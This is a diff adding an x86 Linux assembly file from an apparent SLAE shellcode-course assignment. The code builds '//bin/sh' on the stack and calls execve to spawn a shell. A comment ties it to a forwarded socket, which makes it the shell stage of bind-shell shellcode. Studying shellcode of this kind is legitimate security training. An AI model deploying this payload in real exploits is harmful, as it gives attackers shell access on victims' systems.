SLAE Assignment #1

exam1/execve-stack.nasm

@@ -0,0 +1,57 @@
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+        ; 
+        ; =============================== EXECVE =====================================
+        ;
+	; Now as we forwarded sockfd to a client, we can spawn shell.
+       	; Prepare the path, in little-endian, using the Python
+        ; >>> '//bin/sh'[::-1].encode('hex')
+        ; '68732f6e69622f2f'
+        ;
+        ; int execve(const char *filename, char *const argv[], char *const envp[]);
+        ; EAX           EBX,                    ECX,            EDX
+        ; 11            '//bin/sh'              PTR to EBX      NULL
+       	;
+        ;
+
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+
+	
+	; === EXIT(0) ===
+	; void _exit(int status);
+	; /usr/include/asm/unistd_32.h:#define __NR_exit		  1
+	xor eax, eax	; EAX = 0x000000
+	mov al, 1	; EAX = 0x000001	1: exit syscall
+	xor ebx, ebx	; EBX = 0x000000	0: success status
+	int 0x80
+
+
+;section .data